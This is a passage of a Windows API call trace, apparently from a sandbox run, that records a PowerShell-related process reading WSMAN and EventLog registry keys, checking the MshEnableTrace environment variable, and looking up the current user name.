	[0815.096] RegEnumValueW (in: hKey=0x304, dwIndex=0x2, lpValueName=0x356120, lpcchValueName=0x1ad3c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1ad3c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0815.096] CoTaskMemFree (pv=0x356120) 
	[0815.096] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ad3ac, lpData=0x0, lpcbData=0x1ad3a8*=0x0 | out: lpType=0x1ad3ac*=0x1, lpData=0x0, lpcbData=0x1ad3a8*=0x8) returned 0x0
	[0815.096] CoTaskMemAlloc (cb=0xc) returned 0x3c6e60
	[0815.096] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ad37c, lpData=0x3c6e60, lpcbData=0x1ad378*=0x8 | out: lpType=0x1ad37c*=0x1, lpData="2.0", lpcbData=0x1ad378*=0x8) returned 0x0
	[0815.096] CoTaskMemFree (pv=0x3c6e60) 
	[0816.451] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad368 | out: phkResult=0x1ad368*=0x30c) returned 0x0
	[0816.451] RegQueryInfoKeyW (in: hKey=0x30c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ad26c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad268, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ad26c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad268*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0816.451] CoTaskMemFree (pv=0x0) 
	[0816.451] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0816.452] RegEnumValueW (in: hKey=0x30c, dwIndex=0x0, lpValueName=0x356120, lpcchValueName=0x1ad318, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1ad318, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0816.452] CoTaskMemFree (pv=0x356120) 
	[0816.452] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0816.452] RegEnumValueW (in: hKey=0x30c, dwIndex=0x1, lpValueName=0x356120, lpcchValueName=0x1ad318, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1ad318, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0816.452] CoTaskMemFree (pv=0x356120) 
	[0816.452] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0816.452] RegEnumValueW (in: hKey=0x30c, dwIndex=0x2, lpValueName=0x356120, lpcchValueName=0x1ad318, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1ad318, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0816.452] CoTaskMemFree (pv=0x356120) 
	[0816.452] RegQueryValueExW (in: hKey=0x30c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ad2fc, lpData=0x0, lpcbData=0x1ad2f8*=0x0 | out: lpType=0x1ad2fc*=0x1, lpData=0x0, lpcbData=0x1ad2f8*=0x8) returned 0x0
	[0816.452] CoTaskMemAlloc (cb=0xc) returned 0x3c7260
	[0816.452] RegQueryValueExW (in: hKey=0x30c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ad2cc, lpData=0x3c7260, lpcbData=0x1ad2c8*=0x8 | out: lpType=0x1ad2cc*=0x1, lpData="2.0", lpcbData=0x1ad2c8*=0x8) returned 0x0
	[0816.452] CoTaskMemFree (pv=0x3c7260) 
	[0816.454] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0816.454] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0816.454] CoTaskMemFree (pv=0x3cba10) 
	[0818.055] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0818.055] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0818.055] CoTaskMemFree (pv=0x3cba10) 
	[0818.060] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad398 | out: phkResult=0x1ad398*=0x31c) returned 0x0
	[0818.065] RegQueryInfoKeyW (in: hKey=0x31c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ad30c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad308, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ad30c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad308*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0818.065] CoTaskMemFree (pv=0x0) 
	[0818.066] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0818.066] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x0, lpName=0x356120, lpcchName=0x1ad398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ad398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0818.066] CoTaskMemFree (pv=0x356120) 
	[0818.066] CoTaskMemFree (pv=0x0) 
	[0818.066] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0818.066] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x1, lpName=0x356120, lpcchName=0x1ad398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ad398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0818.066] CoTaskMemFree (pv=0x356120) 
	[0818.066] CoTaskMemFree (pv=0x0) 
	[0818.066] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0818.066] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x2, lpName=0x356120, lpcchName=0x1ad398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ad398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0818.066] CoTaskMemFree (pv=0x356120) 
	[0818.066] CoTaskMemFree (pv=0x0) 
	[0818.066] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0818.066] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x3, lpName=0x356120, lpcchName=0x1ad398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ad398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0818.066] CoTaskMemFree (pv=0x356120) 
	[0818.066] CoTaskMemFree (pv=0x0) 
	[0818.066] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0818.067] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x4, lpName=0x356120, lpcchName=0x1ad398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ad398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0818.067] CoTaskMemFree (pv=0x356120) 
	[0818.067] CoTaskMemFree (pv=0x0) 
	[0818.067] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0818.067] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x5, lpName=0x356120, lpcchName=0x1ad398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ad398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0818.067] CoTaskMemFree (pv=0x356120) 
	[0818.067] CoTaskMemFree (pv=0x0) 
	[0818.067] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0818.067] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x6, lpName=0x356120, lpcchName=0x1ad398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ad398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0818.067] CoTaskMemFree (pv=0x356120) 
	[0818.067] CoTaskMemFree (pv=0x0) 
	[0818.067] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0818.067] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x7, lpName=0x356120, lpcchName=0x1ad398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ad398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0818.067] CoTaskMemFree (pv=0x356120) 
	[0818.067] CoTaskMemFree (pv=0x0) 
	[0818.067] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0818.067] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x8, lpName=0x356120, lpcchName=0x1ad398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ad398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0818.068] CoTaskMemFree (pv=0x356120) 
	[0818.068] CoTaskMemFree (pv=0x0) 
	[0818.068] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3f8 | out: phkResult=0x1ad3f8*=0x324) returned 0x0
	[0818.068] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3f8 | out: phkResult=0x1ad3f8*=0x0) returned 0x2
	[0818.068] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3f8 | out: phkResult=0x1ad3f8*=0x328) returned 0x0
	[0818.068] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3f8 | out: phkResult=0x1ad3f8*=0x0) returned 0x2
	[0818.068] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3f8 | out: phkResult=0x1ad3f8*=0x330) returned 0x0
	[0818.068] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3f8 | out: phkResult=0x1ad3f8*=0x0) returned 0x2
	[0818.068] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3f8 | out: phkResult=0x1ad3f8*=0x334) returned 0x0
	[0818.068] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3f8 | out: phkResult=0x1ad3f8*=0x0) returned 0x2
	[0818.069] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3f8 | out: phkResult=0x1ad3f8*=0x338) returned 0x0
	[0818.069] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3f8 | out: phkResult=0x1ad3f8*=0x0) returned 0x2
	[0818.069] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3f8 | out: phkResult=0x1ad3f8*=0x33c) returned 0x0
	[0818.069] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3f8 | out: phkResult=0x1ad3f8*=0x0) returned 0x2
	[0818.069] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3f8 | out: phkResult=0x1ad3f8*=0x340) returned 0x0
	[0818.069] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3f8 | out: phkResult=0x1ad3f8*=0x0) returned 0x2
	[0818.069] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3f8 | out: phkResult=0x1ad3f8*=0x344) returned 0x0
	[0818.069] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3f8 | out: phkResult=0x1ad3f8*=0x0) returned 0x2
	[0818.069] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3f8 | out: phkResult=0x1ad3f8*=0x348) returned 0x0
	[0818.069] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3f8 | out: phkResult=0x1ad3f8*=0x34c) returned 0x0
	[0818.070] RegCloseKey (hKey=0x34c) returned 0x0
	[0818.070] RegCloseKey (hKey=0x31c) returned 0x0
	[0818.071] RegCloseKey (hKey=0x348) returned 0x0
	[0818.080] CoTaskMemAlloc (cb=0x804) returned 0x1b8365d0
	[0818.081] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8365d0, nSize=0x1ad608 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad608) returned 0x1
	[0818.082] CoTaskMemFree (pv=0x1b8365d0) 
	[0818.083] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0818.083] GetUserNameW (in: lpBuffer=0x356120, pcbBuffer=0x1ad648 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad648) returned 1
	[0818.084] CoTaskMemFree (pv=0x356120) 
	[0819.369] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad348 | out: phkResult=0x1ad348*=0x350) returned 0x0
	[0819.369] RegQueryInfoKeyW (in: hKey=0x350, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ad2bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad2b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ad2bc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad2b8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.369] CoTaskMemFree (pv=0x0) 
	[0819.369] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0819.369] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x0, lpName=0x356120, lpcchName=0x1ad348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ad348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.369] CoTaskMemFree (pv=0x356120) 
	[0819.369] CoTaskMemFree (pv=0x0) 
	[0819.369] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0819.369] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x1, lpName=0x356120, lpcchName=0x1ad348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ad348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.369] CoTaskMemFree (pv=0x356120) 
	[0819.369] CoTaskMemFree (pv=0x0) 
	[0819.369] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0819.370] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x2, lpName=0x356120, lpcchName=0x1ad348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ad348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.370] CoTaskMemFree (pv=0x356120) 
	[0819.370] CoTaskMemFree (pv=0x0) 
	[0819.370] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0819.370] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x3, lpName=0x356120, lpcchName=0x1ad348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ad348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.370] CoTaskMemFree (pv=0x356120) 
	[0819.370] CoTaskMemFree (pv=0x0) 
	[0819.370] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0819.370] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x4, lpName=0x356120, lpcchName=0x1ad348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ad348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.370] CoTaskMemFree (pv=0x356120) 
	[0819.370] CoTaskMemFree (pv=0x0) 
	[0819.370] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0819.370] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x5, lpName=0x356120, lpcchName=0x1ad348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ad348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.370] CoTaskMemFree (pv=0x356120) 
	[0819.370] CoTaskMemFree (pv=0x0) 
	[0819.370] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0819.371] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x6, lpName=0x356120, lpcchName=0x1ad348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ad348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.371] CoTaskMemFree (pv=0x356120) 
	[0819.371] CoTaskMemFree (pv=0x0) 
	[0819.371] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0819.371] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x7, lpName=0x356120, lpcchName=0x1ad348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ad348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.371] CoTaskMemFree (pv=0x356120) 
	[0819.371] CoTaskMemFree (pv=0x0) 
	[0819.371] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0819.371] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x8, lpName=0x356120, lpcchName=0x1ad348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ad348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.371] CoTaskMemFree (pv=0x356120) 
	[0819.371] CoTaskMemFree (pv=0x0) 
	[0819.371] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x354) returned 0x0
	[0819.371] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x0) returned 0x2
	[0819.371] RegOpenKeyExW (in: hKey=0x350, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x358) returned 0x0
	[0819.372] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x0) returned 0x2
	[0819.372] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x35c) returned 0x0
	[0819.372] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x0) returned 0x2
	[0819.372] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x360) returned 0x0
	[0819.372] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x0) returned 0x2
	[0819.372] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x364) returned 0x0
	[0819.372] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x0) returned 0x2
	[0819.372] RegOpenKeyExW (in: hKey=0x350, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x368) returned 0x0
	[0819.372] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x0) returned 0x2
	[0819.373] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x36c) returned 0x0
	[0819.373] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x0) returned 0x2
	[0819.373] RegOpenKeyExW (in: hKey=0x350, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x370) returned 0x0
	[0819.373] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x0) returned 0x2
	[0819.373] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x374) returned 0x0
	[0819.373] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3a8 | out: phkResult=0x1ad3a8*=0x378) returned 0x0
	[0819.373] RegCloseKey (hKey=0x378) returned 0x0
	[0819.373] RegCloseKey (hKey=0x350) returned 0x0
	[0819.374] RegCloseKey (hKey=0x374) returned 0x0
	[0819.375] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad348 | out: phkResult=0x1ad348*=0x374) returned 0x0
	[0819.375] RegQueryInfoKeyW (in: hKey=0x374, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ad2bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad2b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ad2bc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad2b8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.375] CoTaskMemFree (pv=0x0) 
	[0819.375] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0819.375] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x0, lpName=0x356120, lpcchName=0x1ad348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ad348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.375] CoTaskMemFree (pv=0x356120) 
	[0819.375] CoTaskMemFree (pv=0x0) 
	[0819.375] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0819.375] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x1, lpName=0x356120, lpcchName=0x1ad348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ad348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.375] CoTaskMemFree (pv=0x356120) 
	[0819.375] CoTaskMemFree (pv=0x0) 
	[0819.375] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0819.375] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x2, lpName=0x356120, lpcchName=0x1ad348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ad348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.375] CoTaskMemFree (pv=0x356120) 
	[0819.375] CoTaskMemFree (pv=0x0) 
	[0819.376] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0819.376] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x3, lpName=0x356120, lpcchName=0x1ad348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ad348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.376] CoTaskMemFree (pv=0x356120) 
	[0819.376] CoTaskMemFree (pv=0x0) 
	[0819.376] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0819.376] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x4, lpName=0x356120, lpcchName=0x1ad348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ad348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.376] CoTaskMemFree (pv=0x356120) 
	[0819.376] CoTaskMemFree (pv=0x0) 
	[0819.376] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0819.376] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x5, lpName=0x356120, lpcchName=0x1ad348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ad348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.376] CoTaskMemFree (pv=0x356120) 
	[0819.376] CoTaskMemFree (pv=0x0) 
	[0819.376] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0819.376] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x6, lpName=0x356120, lpcchName=0x1ad348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ad348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.376] CoTaskMemFree (pv=0x356120) 
	[0819.376] CoTaskMemFree (pv=0x0) 
	[0819.376] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0819.377] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x7, lpName=0x356120, lpcchName=0x1ad348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ad348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.377] CoTaskMemFree (pv=0x356120) 
	[0819.377] CoTaskMemFree (pv=0x0) 
